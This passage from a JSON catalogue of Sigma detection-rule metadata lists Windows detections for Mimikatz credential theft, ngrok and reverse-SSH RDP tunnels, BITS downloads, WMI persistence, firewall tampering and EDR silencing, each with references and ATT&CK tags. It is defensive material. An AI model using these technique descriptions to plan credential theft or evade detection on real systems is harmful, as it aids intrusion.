"0c8ab3eb-df48-4b9c-ace7-beacaac81cc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "db809f10-56ce-4420-8c86-d6a7d793c79c", "value": "Potential Defense Evasion Via Raw Disk Access By Uncommon Tools" }, { "description": "This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)", "meta": { "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "creation_date": "2017-01-10", "falsepositive": [ "Naughty administrators", "AV Signature updates", "Files with Mimikatz in their filename" ], "filename": "win_alert_mimikatz_keywords.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://tools.thehacker.recipes/mimikatz/modules", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/win_alert_mimikatz_keywords.yml" ], "tags": [ "attack.s0002", "attack.lateral-movement", "attack.credential-access", "car.2013-07-001", "car.2019-04-004", "attack.t1003.002", "attack.t1003.004", "attack.t1003.001", "attack.t1003.006" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "06d71506-7beb-4f22-8888-e2e5e2ca7fd8", "value": "Mimikatz Use" }, { "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-04-29", "falsepositive": [ "Unknown" ], "filename": "win_terminalservices_rdp_ngrok.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", "https://ngrok.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml" ], "tags": [ "attack.command-and-control", "attack.t1090" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "64d51a51-32a6-49f0-9f3d-17e34d640272", "value": "Ngrok Usage with Remote Desktop Service" }, { "description": "Detects new BITS transfer job saving local files with potential suspicious extensions", "meta": { "author": "frack113", "creation_date": "2022-03-01", "falsepositive": [ "While the file extensions in question can be suspicious at times. It's best to add filters according to your environment to avoid large amount false positives" ], "filename": "win_bits_client_new_transfer_saving_susp_extensions.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", "value": "BITS Transfer Job Downloading File Potential Suspicious Extension" }, { "description": "Detects the creation of a new bits job by PowerShell", "meta": { "author": "frack113", "creation_date": "2022-03-01", "falsepositive": [ "Administrator PowerShell scripts" ], "filename": "win_bits_client_new_job_via_powershell.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_job_via_powershell.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fe3a2d49-f255-4d10-935c-bda7391108eb", "value": "New BITS Job Created Via PowerShell" }, { "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-10", "falsepositive": [ "This rule doesn't exclude other known TLDs such as \".org\" or \".net\". It's recommended to apply additional filters for software and scripts that leverage the BITS service" ], "filename": "win_bits_client_new_transfer_via_uncommon_tld.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/malmoeb/status/1535142803075960832", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", "value": "BITS Transfer Job With Uncommon Or Suspicious Remote TLD" }, { "description": "Detects BITS transfer job downloading files from a file sharing domain.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "win_bits_client_new_transfer_via_file_sharing_domains.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/malmoeb/status/1535142803075960832", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d635249d-86b5-4dad-a8c7-d7272b788586", "value": "BITS Transfer Job Download From File Sharing Domains" }, { "description": "Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "win_bits_client_new_trasnfer_susp_local_folder.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", "value": "BITS Transfer Job Download To Potential Suspicious Folder" }, { "description": "Detects the creation of a new bits job by Bitsadmin", "meta": { "author": "frack113", "creation_date": "2022-03-01", "falsepositive": [ "Many legitimate applications or scripts could leverage \"bitsadmin\". This event is best correlated with EID 16403 via the JobID field" ], "filename": "win_bits_client_new_job_via_bitsadmin.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1ff315dc-2a3a-4b71-8dde-873818d25d39", "value": "New BITS Job Created Via Bitsadmin" }, { "description": "Detects a BITS transfer job downloading file(s) from a direct IP address.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-11", "falsepositive": [ "Unknown" ], "filename": "win_bits_client_new_transfer_via_ip_address.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", "value": "BITS Transfer Job Download From Direct IP" }, { "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.", "meta": { "author": "Pushkarev Dmitry", "creation_date": "2020-06-28", "falsepositive": [ "Need tuning applocker or add exceptions in SIEM" ], "filename": "win_applocker_file_was_not_allowed_to_run.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/using-event-viewer-with-applocker", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/what-is-applocker", "https://nxlog.co/documentation/nxlog-user-guide/applocker.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml" ], "tags": [ "attack.execution", "attack.t1204.002", "attack.t1059.001", "attack.t1059.003", "attack.t1059.005", "attack.t1059.006", "attack.t1059.007" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "cc3502b5-30cc-4473-ad48-42d51a6ef6d1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "401e5d00-b944-11ea-8f9a-00163ecd60ae", "value": "File Was Not Allowed To Run" }, { "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", "meta": { "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", "creation_date": "2017-08-22", "falsepositive": [ "Unknown (data set is too small; further testing needed)" ], "filename": "win_wmi_persistence.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", "https://twitter.com/mattifestation/status/899646620148539397", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/wmi/win_wmi_persistence.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1546.003" ] }, "related": [ { "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", "value": "WMI Persistence" }, { "description": "Detects activity when Windows Defender Firewall has been reset to its default configuration", "meta": { "author": "frack113", "creation_date": "2022-02-19", "falsepositive": "No established falsepositives", "filename": "win_firewall_as_reset_config.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_reset_config.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "04b60639-39c0-412a-9fbe-e82499c881a3", "value": "Windows Defender Firewall Has Been Reset To Its Default Configuration" }, { "description": "Detects activity when The Windows Defender Firewall service failed to load Group Policy", "meta": { "author": "frack113", "creation_date": "2022-02-19", "falsepositive": "No established falsepositives", "filename": "win_firewall_as_failed_load_gpo.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7ec15688-fd24-4177-ba43-1a950537ee39", "value": "The Windows Defender Firewall Service Failed To Load Group Policy" }, { "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-17", "falsepositive": "No established falsepositives", "filename": "win_firewall_as_delete_all_rules.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_delete_all_rules.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "79609c82-a488-426e-abcf-9f341a39365d", "value": "All Rules Have Been Deleted From The Windows Firewall Configuration" }, { "description": "Detects when a rule has been added to the Windows Firewall exception list", "meta": { "author": "frack113", "creation_date": "2022-02-19", "falsepositive": "No established falsepositives", "filename": "win_firewall_as_add_rule.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cde0a575-7d3d-4a49-9817-b8004a7bf105", "value": "Uncommon New Firewall Rule Added In Windows Firewall Exception List" }, { "description": "Detects the addition of a new \"Allow\" firewall rule by the WMI process (WmiPrvSE.EXE).\nThis can occur if an attacker leverages PowerShell cmdlets such as \"New-NetFirewallRule\", or directly uses WMI CIM classes such as \"MSFT_NetFirewallRule\".\n", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-05-10", "falsepositive": [ "Administrator scripts or activity." ], "filename": "win_firewall_as_add_rule_wmiprvse.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://malware.news/t/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/72170", "https://cybersecuritynews.com/rhysida-ransomware-attacking-windows/", "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-24---set-a-firewall-rule-using-new-netfirewallrule", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule_wmiprvse.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eca81e8d-09e1-4d04-8614-c91f44fd0519", "value": "New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE" }, { "description": "Detects activity when the settings of the Windows firewall have been changed", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-02-19", "falsepositive": "No established falsepositives", "filename": "win_firewall_as_setting_change.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_setting_change.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "00bb5bd5-1379-4fcf-a965-a5b6f7478064", "value": "Windows Firewall Settings Have Been Changed" }, { "description": "Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location.", "meta": { "author": "frack113", "creation_date": "2023-02-26", "falsepositive": [ "Unknown" ], "filename": "win_firewall_as_add_rule_susp_folder.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/#", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", "value": "New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application" }, { "description": "Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall", "meta": { "author": "frack113", "creation_date": "2022-02-19", "falsepositive": "No established falsepositives", "filename": "win_firewall_as_delete_rule.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_delete_rule.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", "value": "A Rule Has Been Deleted From The Windows Firewall Exception List" }, { "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-14", "falsepositive": [ "Legitimate package hosted on a known and authorized remote location" ], "filename": "win_diagnosis_scripted_load_remote_diagcab.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/j00sean/status/1537750439701225472", "https://twitter.com/nas_bench/status/1539679555908141061", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml" ], "tags": [ "attack.execution" ] }, "uuid": "50cb47b8-2c33-4b23-a2e9-4600657d9746", "value": "Loading Diagcab Package From Remote Path" }, { "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", "meta": { "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", "creation_date": "2017-08-22", "falsepositive": [ "Unknown (data set is too small; further testing needed)" ], "filename": "win_security_wmi_persistence.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", "https://twitter.com/mattifestation/status/899646620148539397", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmi_persistence.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1546.003" ] }, "related": [ { "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f033f3f3-fd24-4995-97d8-a3bb17550a88", "value": "WMI Persistence - Security" }, { "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", "meta": { "author": "Samir Bousseaden", "creation_date": "2019-02-16", "falsepositive": [ "Programs that connect locally to the RDP port" ], "filename": "win_security_rdp_reverse_tunnel.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx", "https://twitter.com/SBousseaden/status/1096148422984384514", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml" ], "tags": [ "attack.defense-evasion", "attack.command-and-control", "attack.lateral-movement", "attack.t1090.001", "attack.t1090.002", "attack.t1021.001", "car.2013-07-002" ] }, "related": [ { "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "69b8fd78-40e8-4600-ae4d-662c9d7afdb3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "value": "RDP over Reverse SSH Tunnel WFP" }, { "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-06-07", "falsepositive": [ "Unknown" ], "filename": "win_security_camera_microphone_access.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", "https://twitter.com/duzvik/status/1269671601852813320", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_camera_microphone_access.yml" ], "tags": [ "attack.collection", "attack.t1123" ] }, "related": [ { "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8cd538a4-62d5-4e83-810b-12d41e428d6e", "value": "Processes Accessing the Microphone and Webcam" }, { "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", "meta": { "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Unknown" ], "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" ], "tags": [ "attack.lateral-movement", "attack.privilege-escalation", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", "value": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'" }, { "description": "Detects Obfuscated Powershell via Stdin in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "value": "Invoke-Obfuscation Via Stdin - Security" }, { "description": "Detects non-system users performing privileged operation os the SCM database", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "creation_date": "2019-08-15", "falsepositive": [ "Unknown" ], "filename": "win_security_scm_database_privileged_operation.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_privileged_operation.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dae8171c-5ec6-4396-b210-8466585b53e9", "value": "SCM Database Privileged Operation" }, { "description": "Alerts on Metasploit host's authentications on the domain.", "meta": { "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", "creation_date": "2020-05-06", "falsepositive": [ "Linux hostnames composed of 16 characters." ], "filename": "win_security_metasploit_authentication.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_authentication.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "72124974-a68b-4366-b990-d30e0b2a190d", "value": "Metasploit SMB Authentication" }, { "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", "meta": { "author": "OTR (Open Threat Research)", "creation_date": "2018-11-28", "falsepositive": [ "Domain Controllers acting as printer servers too? :)" ], "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/_dirkjan/status/1309214379003588608", "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", "value": "DCERPC SMB Spoolss Named Pipe" }, { "description": "Detects execution of EDRSilencer, a tool that abuses the Windows Filtering Platform (WFP) to block the outbound traffic of running EDR agents based on specific hardcoded filter names.\n", "meta": { "author": "Thodoris Polyzos (@SmoothDeploy)", "creation_date": "2024-01-29", "falsepositive": [ "Unknown" ], "filename": "win_security_hktl_edr_silencer.yml", "level": "high", "logsource.category": "No established 